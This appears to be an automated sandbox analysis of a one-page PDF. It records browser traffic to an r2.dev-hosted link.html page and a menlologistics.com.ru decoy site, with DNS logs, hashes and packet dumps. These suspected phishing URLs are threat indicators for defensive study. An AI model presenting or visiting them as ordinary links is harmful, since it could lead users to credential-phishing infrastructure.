Source: global traffic	HTTP traffic detected: GET /link.html HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /, HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: menlologistics.com.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /, HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: menlologistics.com.ru
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (460), with CRLF line terminators
Category:	dropped
Size (bytes):	7161
Entropy (8bit):	4.715343276503233
Encrypted:	false
SSDEEP:	96:+JiS2kTQ0NnlzxDTsXkC3KzHpkCn/aOPDR3HPQ4glt7DpDGcaajLX:yiSNQuzVsXkC6zHpTx/QBn7FDGcaajLX
MD5:	240002E80E23F3F9650922BADC3D4531
SHA1:	3CB73398EEA7BC5AF2DB6ABB50105C62892F7548
SHA-256:	3340D7E30B68D45948031BC7022A630DB1DB2D400F95B4E5A1C9D1175FB3DED5
SHA-512:	8D9D0992A1E6AE057C68DF656F1484502D30B5D74E065DD19FEBB2403E704EB45B546B354BFB5041C1C777A253F3321B4B40906F1191825B70B662301C59247D
Malicious:	false
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Tuner Car Community - menlologistics.com.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://www.experienceferrari.com/wp-content/uploads/2024/04/1968-Dodge-Charger-RT.jpg') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;..

File type:	PDF document, version 1.7, 1 pages
Entropy (8bit):	7.9608447440069146
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	xJwSq336bs.pdf
File size:	79'849 bytes
MD5:	3c860412604778442a97627e84abc63b
SHA1:	53cf6e9968a5234c923f2826d5e9fa97c880c3fd
SHA256:	bb6e4fa5ab06f4c632734a62f0009901a4b6b32b4c71de65aa644c19c5e729ca
SHA512:	39fe1bf8af595babb7a228c13ce9d7991f3a201611a76cbe761770c9b84eb5e9c1a089c2f0fcdcd40008f478def26865153b704e1a68d1ed804059b008b56e62
SSDEEP:	1536:V9Vjwuv6NNOYSOsDTJfyW19dDAhDCqdjeCzV3Ll5BvCAY5n:flSRzsr195adjeGLlX5Yx
TLSH:	1E73F260E85660CCEAC35561397A35DB031EB37739DEA4961CAC8F13C084DC5E2A7DAB
File Content Preview:	%PDF-1.7.%......1 0 obj.<</Producer(-)/Title null/Author null/Subject null/Keywords null/Creator null/CreationDate null/ModDate null/Trapped null>>.endobj..2 0 obj.<</Type/Catalog/Pages 3 0 R/Lang(en-US)/Metadata 4 0 R>>.endobj..3 0 obj.<</Type/Pages/Coun

General
Header:	%PDF-1.7
Total Entropy:	7.960845
Total Bytes:	79849
Stream Entropy:	7.996637
Stream Bytes:	73840
Entropy outside Streams:	5.094049
Bytes outside Streams:	6009
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	44
endobj	44
stream	11
endstream	11
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

ID	DHASH	MD5
26	0000000000000000	e81e69435f6c2526e73033c37d10de22
27	266371554d33330f	dee0a612c224be4bbb8a841170a19f97
31	b066a4b4b4c16ef2	7d931cf1c531361030aa123a5c308130
34	d1c0d4d4d4d4c0d4	f6784725bd69e7c444d6a5fe69469f0d

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2024 21:05:51.807039976 CEST	138	138	192.168.2.4	192.168.2.255
Jul 4, 2024 21:05:57.531136036 CEST	53	51011	1.1.1.1	192.168.2.4
Jul 4, 2024 21:05:57.553030014 CEST	53	56886	1.1.1.1	192.168.2.4
Jul 4, 2024 21:05:58.548449993 CEST	53191	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:05:58.548644066 CEST	61596	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:05:58.561264992 CEST	53	53191	1.1.1.1	192.168.2.4
Jul 4, 2024 21:05:58.562977076 CEST	53	61596	1.1.1.1	192.168.2.4
Jul 4, 2024 21:05:58.661727905 CEST	53	64067	1.1.1.1	192.168.2.4
Jul 4, 2024 21:05:59.600199938 CEST	57318	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:05:59.600341082 CEST	61221	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:05:59.607589006 CEST	53	61221	1.1.1.1	192.168.2.4
Jul 4, 2024 21:05:59.607681036 CEST	53	57318	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:00.420170069 CEST	64031	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:00.420325994 CEST	52778	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:00.520267010 CEST	53	52778	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:00.610150099 CEST	53	64031	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:01.941586971 CEST	57433	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:01.941735029 CEST	64118	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:01.949749947 CEST	53	64118	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:01.950961113 CEST	53	57433	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:03.171994925 CEST	49708	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:03.172158957 CEST	63976	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:03.250080109 CEST	64040	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:03.250408888 CEST	50806	53	192.168.2.4	1.1.1.1
Jul 4, 2024 21:06:03.263780117 CEST	53	64040	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:03.264045000 CEST	53	50806	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:03.264600039 CEST	53	49708	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:03.266141891 CEST	53	63976	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:09.872529030 CEST	53	64041	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:15.576055050 CEST	53	62582	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:34.620901108 CEST	53	57377	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:56.962629080 CEST	53	52289	1.1.1.1	192.168.2.4
Jul 4, 2024 21:06:57.200464964 CEST	53	57946	1.1.1.1	192.168.2.4
Jul 4, 2024 21:07:26.090370893 CEST	53	60120	1.1.1.1	192.168.2.4
Jul 4, 2024 21:08:11.245994091 CEST	53	59196	1.1.1.1	192.168.2.4

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 4, 2024 21:05:57.545981884 CEST	1.1.1.1	192.168.2.4	0x8519	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 4, 2024 21:05:57.548556089 CEST	1.1.1.1	192.168.2.4	0xd27c	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 4, 2024 21:05:58.561264992 CEST	1.1.1.1	192.168.2.4	0xa44d	No error (0)	pub-ad8bdbb321694934a9a218eeb6868559.r2.dev		104.18.2.35	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:05:58.561264992 CEST	1.1.1.1	192.168.2.4	0xa44d	No error (0)	pub-ad8bdbb321694934a9a218eeb6868559.r2.dev		104.18.3.35	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:05:59.607589006 CEST	1.1.1.1	192.168.2.4	0x1a86	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Jul 4, 2024 21:05:59.607681036 CEST	1.1.1.1	192.168.2.4	0x5098	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:05:59.607681036 CEST	1.1.1.1	192.168.2.4	0x5098	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:00.520267010 CEST	1.1.1.1	192.168.2.4	0x67e8	No error (0)	menlologistics.com.ru			65	IN (0x0001)	false
Jul 4, 2024 21:06:00.610150099 CEST	1.1.1.1	192.168.2.4	0x5972	No error (0)	menlologistics.com.ru		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:00.610150099 CEST	1.1.1.1	192.168.2.4	0x5972	No error (0)	menlologistics.com.ru		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:01.949749947 CEST	1.1.1.1	192.168.2.4	0xe3ea	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 4, 2024 21:06:01.950961113 CEST	1.1.1.1	192.168.2.4	0x7c3e	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.263780117 CEST	1.1.1.1	192.168.2.4	0x4c6c	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.263780117 CEST	1.1.1.1	192.168.2.4	0x4c6c	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.263780117 CEST	1.1.1.1	192.168.2.4	0x4c6c	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.263780117 CEST	1.1.1.1	192.168.2.4	0x4c6c	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.264600039 CEST	1.1.1.1	192.168.2.4	0x7650	No error (0)	menlologistics.com.ru		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.264600039 CEST	1.1.1.1	192.168.2.4	0x7650	No error (0)	menlologistics.com.ru		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 4, 2024 21:06:03.266141891 CEST	1.1.1.1	192.168.2.4	0x7c91	No error (0)	menlologistics.com.ru			65	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:05:38 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-04 19:05:38 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0758) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=43104 Date: Thu, 04 Jul 2024 19:05:38 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:05:39 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-04 19:05:40 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=43124 Date: Thu, 04 Jul 2024 19:05:39 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-04 19:05:40 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:05:45 UTC	475	OUT	GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
2024-07-04 19:05:45 UTC	198	IN	HTTP/1.1 304 Not Modified Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 01 May 2023 15:02:33 GMT ETag: "78-5faa31cce96da" Date: Thu, 04 Jul 2024 19:05:45 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:05:46 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-04 19:05:47 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 1c4e35e4-2d10-4083-ad66-5148fc96ab02 MS-RequestId: 4fc41ec6-8a0f-4025-be76-704b47777390 MS-CV: HKeoY87W0k2Xmfnm.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 04 Jul 2024 19:05:46 GMT Connection: close Content-Length: 24490
2024-07-04 19:05:47 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-04 19:05:47 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:05:59 UTC	695	OUT	GET /link.html HTTP/1.1 Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:05:59 UTC	282	IN	HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 19:05:59 GMT Content-Type: text/html Content-Length: 5513 Connection: close Accept-Ranges: bytes ETag: "a7ed94669c36345d5489425b9283985d" Last-Modified: Thu, 04 Jul 2024 12:00:24 GMT Server: cloudflare CF-RAY: 89e163d28eb89e08-EWR
2024-07-04 19:05:59 UTC	1087	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 Data Ascii: <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <style>body
2024-07-04 19:05:59 UTC	1369	IN	Data Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 77 69 64 74 68 3a 20 31 31 38 70 78 3b 68 65 69 67 68 74 3a 20 31 33 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 33 30 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 63 61 6c 2d 62 6f 75 6e 63 65 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 Data Ascii: splay: flex;flex-wrap: wrap;width: 118px;height: 131px;border-radius: 7px;overflow: hidden;margin: 0 auto;margin-top: -306px;animation: cal-bounce 5s infinite;animation-timing-function: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@ke
2024-07-04 19:05:59 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 20 30 2c 20 30 2e 36 37 2c 20 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 Data Ascii: tion: closed-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);transform-origin: top;transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}@keyframes closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rota
